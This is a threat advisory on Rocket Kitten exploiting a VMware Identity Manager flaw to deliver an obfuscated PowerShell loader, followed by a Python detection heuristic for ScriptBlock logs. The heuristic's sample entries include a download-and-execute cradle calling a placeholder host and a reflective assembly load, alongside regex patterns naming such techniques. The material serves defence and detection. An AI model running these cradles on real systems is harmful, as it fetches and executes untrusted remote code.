THREAT LEVEL: Red.

An Iranian cyber espionage group known as Rocket Kitten has begun delivering the Core Impact penetration testing tool to vulnerable machines by exploiting a recently patched critical vulnerability in VMware Workspace ONE Access/Identity Manager. The threat actors exploit the VMware Identity Manager service flaw (CVE-2022-22954) to gain initial access to a target system, then run a PowerShell stager that downloads the next-stage payload, nicknamed PowerTrash Loader. PowerTrash Loader is a heavily obfuscated PowerShell script of roughly 40,000 lines. At the end of the attack chain, PowerTrash Loader loads the Core Impact penetration testing framework into memory.

MITRE ATT&CK tactics and techniques commonly used by Rocket Kitten:

Tactics
TA0001: Initial Access
TA0002: Execution
TA0006: Credential Access
TA0009: Collection
TA0011: Command and Control

Techniques
T1059: Command and Scripting Interpreter
T1189: Drive-by Compromise
T1555.003: Credentials from Password Stores: Credentials from Web Browsers
T1105: Ingress Tool Transfer
T1056.001: Input Capture: Keylogging
T1566.001: Phishing: Spearphishing Attachment
T1566.003: Phishing: Spearphishing via Service
T1204.002: User Execution: Malicious File

Patch Links
https://www.vmware.com/security/advisories/VMSA-2022-0011.html

References
https://blog.morphisec.com/vmware-identity-manager-attack-backdoor
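The chain described above (PowerShell stager, download of a next-stage script, in-memory loading of a large obfuscated payload) is something PowerShell ScriptBlock logging (Event ID 4104) exposes to defenders. The following triage heuristic is an added example, not code from the advisory or from any vendor; the log entries are constructed, the URLs are placeholders, and the line-count threshold is an assumption.

```python
import re

# Constructed ScriptBlock-logging entries for this example; none come from the
# advisory, and the hostnames are placeholders.
SAMPLE_EVENTS = {
    "admin": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
    "cradle": "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/s2.ps1')",
    "reflective": "$x=[Convert]::FromBase64String('QUJDRA=='); [System.Reflection.Assembly]::Load($x)",
    "fetch_only": "Invoke-WebRequest -Uri https://updates.example.invalid/u.ps1 -OutFile C:\\Temp\\u.ps1",
    # Hundreds of base64-decoding lines, standing in for a very large obfuscated loader.
    "bulky": "\n".join(f"$b{i}=[Convert]::FromBase64String('QQ==')" for i in range(600)),
}

# Indicator groups, each weighted by how rarely it appears in routine administration.
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient", re.I)
IN_MEMORY_EXEC = re.compile(r"\bIEX\b|Invoke-Expression|Reflection\.Assembly\]::Load", re.I)
OBFUSCATION_HINTS = re.compile(r"FromBase64String|-join|\[char\]|`", re.I)
MAX_BENIGN_LINES = 500  # assumed threshold; the loader in the advisory is ~40,000 lines


def score_script_block(script: str) -> dict:
    """Return the matched indicator names, a weighted score and a verdict for one script block."""
    reasons = []
    if DOWNLOAD_CRADLE.search(script):
        reasons.append(("download_cradle", 1))
    if IN_MEMORY_EXEC.search(script):
        reasons.append(("in_memory_exec", 2))
    if OBFUSCATION_HINTS.search(script):
        reasons.append(("obfuscation", 1))
    if script.count("\n") + 1 > MAX_BENIGN_LINES:
        reasons.append(("oversized_block", 2))
    score = sum(weight for _, weight in reasons)
    # A single indicator (e.g. a plain download) is common in admin scripts; combinations are not.
    return {"score": score, "reasons": [name for name, _ in reasons], "suspicious": score >= 3}


def triage(events: dict) -> dict:
    """Score every logged block and keep only those that warrant analyst attention."""
    verdicts = {name: score_script_block(script) for name, script in events.items()}
    return {name: v for name, v in verdicts.items() if v["suspicious"]}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_EVENTS).items():
        print(name, verdict["score"], verdict["reasons"])
```

The weights are deliberately coarse: the point is that a download alone is routine, whereas a download combined with in-memory execution, or a huge block full of decoding calls, matches the staged loader behaviour the advisory describes.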